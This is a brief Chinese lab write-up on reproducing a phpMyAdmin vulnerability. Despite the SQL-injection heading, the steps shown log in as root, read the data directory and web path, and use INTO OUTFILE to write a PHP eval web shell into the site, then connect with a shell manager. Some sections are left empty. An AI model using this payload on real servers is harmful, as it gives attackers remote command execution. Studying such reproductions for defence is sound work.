一、漏洞概述
phpMyAdmin是Phpmyadmin团队的一套免费的、基于Web的MySQL数据库管理工具。该工具能够创建和删除数据库,创建、删除、修改数据库表,执行SQL脚本命令等。
在用户帐户页面中发现了一个SQL注入漏洞。创建对此页面的查询时,恶意用户可能会注入自定义SQL来代替其自己的用户名。攻击者必须具有有效的MySQL帐户才能访问服务器。
路径:/pma/index.php 账号密码root:123456
二、影响范围
三、访问页面
四、漏洞复现
1、登录,账号密码root:123456
2、漏洞验证,查询数据库的路径
select @@datadir
3、判断网站路径,如果返回不为空,说明路径正确。
SELECT load_file('/var/www/html/pma/index.php')
4、写入shell
select '<?php echo \'<pre>\';@eval($_POST[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE '/var/www/html/pma/1.php'
5、使用蚁剑等工具连接